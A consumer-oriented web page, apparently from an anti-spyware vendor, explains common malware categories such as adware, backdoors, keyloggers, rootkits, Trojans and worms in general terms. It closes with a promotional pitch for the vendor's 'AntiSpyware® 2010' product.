|
The Many Faces of Spyware
If there's one thing you should know about spyware, it's that no two spyware programs are exactly alike. However, many of them do share the same characteristics, making it possible to categorize the various spyware applications. To help you understand the differences between the various types of spyware, we are providing descriptions of the different spyware categories.
On TV there are commercials. On a computer, there is adware, programs that advertise for things unrelated to the featured site.
Given this definition, it's not hard to realize there is benign or even (arguably) good adware. These programs manifest as advertising blocks on certain websites that allow that domain to be free for the host and/or the service to be free for the user.
Some adware is just as benign, but its instillation skirts an ethical borderline. These adware programs will come bundled with other software but won't state their presence upfront. Sometimes the agreement to post ads will not appear in the download wizard, and sometimes it will only appear buried in the End User License Agreement (the long I Accept contract that few read in full or not at all.)
Finally, there is adware that is undoubtedly malware. This variety is installed unwittingly by a user or comes secretly bundled to another program. The secretive nature of this adware thus gets it categorized as a type of Trojan. These are the most notorious. They do things as invasive as hijacking browser windows to steering you to websites or unspecified homepages. The most well known of this type is the classic popup, an unrequested ad that flashes over other windows. Not only are these types of adware frustrating, due to the unscrupulousness of their installation, these programs often don't come alone and are accompanied by other forms of spyware that monitor your web use.
Backdoors are a particularly dangerous form of Trojan. Once a backdoor is installed on a computer, it allows another user (called a master) to monitor the actions of a computer as well as install a remote access utility. This is a utility that allows access to the computer, its files and commands, and thus the ability to control these things. Remote access is something that system administrators and tech supporters use legally to help set up and repair systems on your computer. Like people using a remote control, these people can access your computer via LAN or the Internet from across town or across the country. A backdoor allows a master to illegally monitor and even control your computer the same way without asking your permission. Consequently a master can
- view confidential information
- execute malicious codes
- launch programs
- send / receive date via the Internet
- delete files and other data
- display notifications
- reboot the system
This means that a single backdoor can facilitate tasks which are usually accomplished by several smaller Trojans. And since masters do not want you to know they are there, they will often be discreet, stealing information without your knowledge. Since many backdoors are not visible in the log of active programs, they are hard to detect.
As their name implies Browser Helper Objects (BHOs) assist a web browser (usually Windows Internet Explorer) in doing some specialized tasks. For example, the plug-in that allows IE to open an Adobe PDF is a BHO, as is the Google Toolbar for IE. But just as with most legitimate programs, illegitimate versions exist as well.
Since BHOs have an unlimited access to the Internet Explorer event model, some malicious programmers have made malware that uses this feature to their advantage. Some BHOs, such as the MyWay Search Bar, would track user activities and then sell that information to 3rd parties. More insidious BHOs are capable of installing Trojans that work in tandem. Download.ject was a famous attack that downloaded a keylogger into the user's computer and then used a BHO to detect whenever a user accessed a secure site. With the keylogger they could track keystrokes to determine what passwords were being entered.
Commercial RAT (or Remote Administration Tool) is not always a bad thing, but when a commercial RAT product is used to remotely administer a user's computer without that user's consent or knowledge, it can turn into an ugly situation. If a commercial RAT program is installed on your system and controlled by an unscrupulous hacker, he or she can shut down programs, delete files and steal all of the information on your hard drive. Commercial RAT attacks may very well be one of the most dangerous spyware risks lurking on the Web.
Data miners are programs that collect data from your computer (such as email addresses, web searches, etc.) and then transmits the data to a third party. Some cookies are data miners, but many cookies are harmless. The cookies that act as data miners can be considered Spyware applications.
Initially the word dialer referred to any programs in a computer that allowed an analog dial-up modem to connect to a phone line. Such programs are necessary for all non-broadband Internet use. However, the word today usually refers to a specific type of fraud that uses a dialer to connect a user to a premium number (equivalent to a 1-900 number) at outrageous cost.
Sometimes the dialer will advertise access to a multitude of special contents. These could include illegal MP3 downloads, pornography, or illegal hacking materials. The most insidious dialer programs though, look for security holes in the settings of a user's OS and change the dial-up numbers to premium numbers without telling the user. These unscrupulous dialer dealers will often have agreements with these premium sites to take a percentage of the profit.
A downloader does exactly what its name implies. This program is a the part of the Trojan that actually downloads the malicious software onto a user's computer. From there, the downloader either launches the malware or registers it in the local operating system requirements so that it will automatically run at a specified time or after a specified action. Sometimes the locations and names of the malware being downloaded are sent from an unseen website, but sometimes they are actually encoded into the downloader itself.
|
 |
Email Worms, like all worms, an email worm is a self-propagating (self replicating) program. This one, logically, is contracted via email. These are perhaps the most recognizable form of malware since almost anyone with an email address has come across their fair share of bogus emails, many of which contain harmful programs.
Not too long ago people began to be very concerned about opening email attachments. These worms were the reason. Like any malicious software, this worm is a program and can only function if it is executed, so it took an active gesture from a user, such as opening the attachment, to install itself on a computer. There are, however, some more complicated email worms that can install themselves by being laced into the html rendering of an email's body. Thus, just reading the email puts the user at some risk, especially if the email client (programs like Microsoft Outlook) had a viewing pane that showed the email if it was simply highlighted in the inbox.
Fortunately, most modern email clients offer plain text rendering of their emails, so it cannot harbor malicious code. Worm makers are wily though, and recently email worms have made a resurgence thanks to a process dubbed social engineering, a method that employs more trickery than coding muscle to get a user to install the worm. Scams such as phishing are particularly successful in getting unsuspecting users to divulge vital information and open themselves up to these worms.
For the most part, email today is much safer than it used to be, but good rules of caution are still needed. Don't open attachments from people/organizations you do not know and be wary of official looking emails that ask for vital information (such as account numbers or credit card numbers). No reputable organization ever asks for these via email, only on their secure sites. And remember, when in doubt, pick up the phone and ask.
|
|
A firewall killer is a malware program designed to disable a PC's firewall
security. In addition to disabling firewalls, these programs are also known
to disable anti-virus and anti-spyware programs and some even have the
ability to delete anti-spyware and anti-virus definitions. In some
instances, a user can tell that a firewall killer has affected their system
due to the fact that the security programs will appear disabled; however,
some firewall killers have advanced to the point where they can completely
disarm a computer's security while making it appear that the firewall and
other security programs are still fully operational. Because of this, the
only way to ensure absence of a firewall killer is with advanced
anti-malware technology.
A flooder can be an Internet nightmare. These programs transmit damaging amounts of data to networks in hopes of overloading and crashing the Internet connection.
Browser hijackers are another type of spyware that you need to concern yourself with. These programs can hijack and change your Internet settings such as your homepage and your search page. If your homepage has ever changed without you initiating it, you have been the victim of a browser hijacking.
A keylogger is a program installed on a user's computer that logs the keystrokes that user enters. Obviously these strokes can be read by a 3rd party and can divulge passwords, credit card numbers or even vital information such as Social Security Numbers.
Most keyloggers are bundled with other malware and can be among the programs installed by Trojan- Downloaders or Trojan-Droppers. Since a keylogger is certainly something a malware programmer wouldn't want you to know about, it is classified as a Trojan as well.
Malware is perhaps the most inclusive label for all malicious software. From the Latin malus, mala which means literally bad, evil, or wrong, the name references any type of program that is designed to damage other software or functions without the user's consent.
Hence viruses, worms, Trojans, backdoors, rootkits, logic bombs, etc. all fit under this category. In addition, programs that are not malicious in themselves but aid in the creation of malicious software are also considered malware since they indirectly accomplish the same thing.
|
|
"P2P" stands for "Peer to Peer" and P2P networks are what many computer users use to share files and programs. Unfortunately, while P2P networks offer consumers the ability to share programs and files with each other, there are also an unfathomable number of spyware and malware programs bundled into the downloads found on these networks. From viruses to keyloggers, P2P users have found themselves victim to many spyware attacks after a seemingly-innocent download experience.
| Potentially Unwanted Applications |
|
|
|
Potentially Unwanted Applications (PUAs) are applications that have no known risks to your computer, but are generally included as bundles with popular applications and sometimes new computers.
Rogue anti-spyware is exactly what it sounds like "Anti-Spyware" programs gone bad. Some rogue anti-spyware programs are simply anti-spyware products that just don't work like they should while other rogue anti-spyware programs are more ominous in nature and actually act as spyware on the systems they are supposed to be protecting. Because it's hard to tell rogue anti-spyware from the real thing, it's critical that you only download and use trusted anti-spyware products.
|
|
A rootkit is a series of programs used by hackers to cover the fact that they are manipulating files in the system. The term derives from a method used to attack Unix servers. In order to achieve administrative access, hackers would gain access to a lower-level user account (either through a cracked password or other vulnerability) and then collect privileges until they achieved root (administrative) rights.
The kit itself is a set of smaller programs designed to put up a smokescreen while hackers work. By installing a kernel module or replacing system files or system libraries, they can make it seem as if nothing is wrong.
Nowadays, this smokescreen is used on Windows based systems as well. The process is made easier since most Windows users have administrative accounts on their home computers. And even though administrative access is not called root access on Windows systems, the method of infection is the same so the name has carried over.
|
|
Spyware is a term that encompasses a broad range of undesirable programs that may infect your computer. If a program invades your privacy by allowing someone else to eavesdrop on your computer activity, it falls into the Spyware category. Some examples of Spyware include keyloggers and tracking cookies. Almost every single computer connected to the Web has been or will be attacked by Spyware of some form. The only way to protect yourself and your privacy is to run a comprehensive anti-spyware program on your system at all times.
|
|
It is a frequent misconception that a cookie is a program. It is not and therefore is incapable of executing any actions, malicious or otherwise. A cookie is a simple pack of data, often a simple text file, that a server sends to a user's browser and that the browser then sends back to the server when that server is accessed. What that means is that certain servers can store a cookie on your computer and when you return to their website, it will recognize you and welcome you to your Homepage. Deleting the cookie does not hurt your computer. It only means that the website doesn't recognize you.
So what's the big deal? Potentially a cookie can aid in the tracking of web activity. These so called tracking cookies may not monitor your presence at one site, but at multiple sites and how often you visit them. If malicious web hosts want to target advertising at you personally, they will probably use cookies to figure out what you look at. Also, by monitoring the web sites you visit cookies can tell these hosts things such as where you bank and shop.
Removing cookies never hurts as they can be resent, but the majority of cookies are harmless. However disabling cookies in your browser can cause many legitimate web sites to work incorrectly as many shopping carts rely on cookies to keep track of what's in your cart and what you've updated.
|
|
These are most commonly referred to as Trojans and are a type of malware categorized by their secrecy in installation. Believe it or not, many viruses used to announce their presence, damaging files or interrupting system functionality with boldness. Today, the multitude of malware programmers want to not be seen or heard. The ideal is that they can spy on you, monitor your web activity, snoop in your vital information, steal account numbers and hijack system operations without your ever knowing it.
Like Odysseus' strategy to conquer Troy by building a giant horse, filling it with soldiers, and then presenting it as a gift to the king, a malicious Trojan invades through secrecy. These are programs that have many variations but all of which intend to do malicious activity on your computer without your being any the wiser. Most often Trojan writers accomplish this by bundling their software to other legitimate programs that a user installs without ever realizing there are armed enemies inside.
|
|
This is a family of Trojans that redirects an infected computer to some location on the Internet, usually a specified web site. It can do this in two ways. One is by sending direct commands to the Internet browser (programs like Internet Explorer or Netscape) and telling it where to go. The other is by replacing certain system files where URLs are stored, such as the hosts file.
The reasons why Trojan-Clickers are used can range from benign (the desire to raise a web-site's hit count for advertising purposes) to malicious (the desire to organize a DoS attack on a particular website or server) to subversive (the desire to lead the victim machine to a website that will then infect it with more malware).
|
|
This is a family of Trojans designed to install malicious software on a user's computer without being detected. The name comes from the program's ability to drop one or many payloads (usually other Trojans) into various files while the user is unaware. Sometimes the Trojan Dropper will do this without any notification and sometimes it will display a false error message about and archived file or operating system. This serves the purpose to distracting the users and making them think that, if the computer is acting strangely, it's a glitch in the software or OS.
The dropper itself has all of the code necessary to install and execute the smaller programs that it drops.
These Trojans are also notorious for including at least one hoax payload. This is a benign and often functioning media application, such as a joke generator, music file, video file, graphic or even a game. These too distract the users and make them think that the file they downloaded is legitimate when really it's a mask for malware that can be redirecting browsers, launching popups or gathering vital data. Furthermore, because of the hoax payload, the hackers can successfully fool some spyware detectors, making them overlook hidden files thinking they're harmless.
|
|
This family of Trojans are proxy servers that are install themselves on victim computers and allow anonymous access to the Internet. Spammers often use Trojan Proxies in order to help propagate their junk email. Spammers won't use their own bandwidth when they can use yours and potentially that of your email contacts. The proxy server turns your computer into a launching platform for Internet material, usually email. Today it's a fairly common practice for coders to infect many machines with Trojan Proxies and then sell the proxy access to unscrupulous spamming agencies.
Not only is this attack an invasion of privacy and a nuisance to your email contacts, it also has the potential to involve your computer in malicious, or even illegal, activity.
|
|
Perhaps the most well known and popularized form of Malware, the virus is a code that executes any malicious intent in a victim machine. Usually a virus's general objective is to infiltrate vital resources, exposing vital data to theft or attack, or to execute a specified program once the user fulfills a specific sequence of actions. A virus differs from a worm in that it does not propagate via a LAN or the Internet. Instead it is usually an infection on a host program, file or disk. Viruses can only activate if a user (wittingly or unwittingly) accesses the infected material and launches the malicious code. Hence viruses usually spread by
- Being launched from an infected file on a network resource accessed by other users
- Being launched from an infected email attachment
- Being launched from an infected storage media (such as a floppy disk, cd, or flash drive).
|
|
Worms are malicious programs that propagate themselves via the Internet and LANs. Unlike a virus, a worm does not have to infect the host program. Hence any legitimate programs that carry worms aren't necessarily compromised by them and can work independently. As a result, worms can spread easily by means of email attachments, instant message attachments, FTP file shares and P2P file shares. This is why P2P resources such as Kazaa or LimeWire are so potentially dangerous. But all of these methods convey media that can potentially harbor worms.
As their name suggests, these parasites are best categorized by their tendency to reproduce themselves rapidly, frequently, and in multiple locations. This makes them more difficult for removal programs to find and remove them. Once they spread to as many computers as possible they do a variety of tasks that include opening up vital data to theft, launching popups and other advertising (adware), hijacking browsers, and spying on user activities (spyware).
The only way to ensure that you are protected from these various spyware threats is through the use of a comprehensive anti-spyware product like AntiSpyware® 2010. Install AntiSpyware® 2010 right now to see exactly which spyware threats you are already infected with and to reduce your risk of future infestations.
Supplementary Resources
Anti Virus Rants
Kasperky's Viruslist.com - General Malware Types
Kasperky's Viruslist.com - Specific Malware Types
|
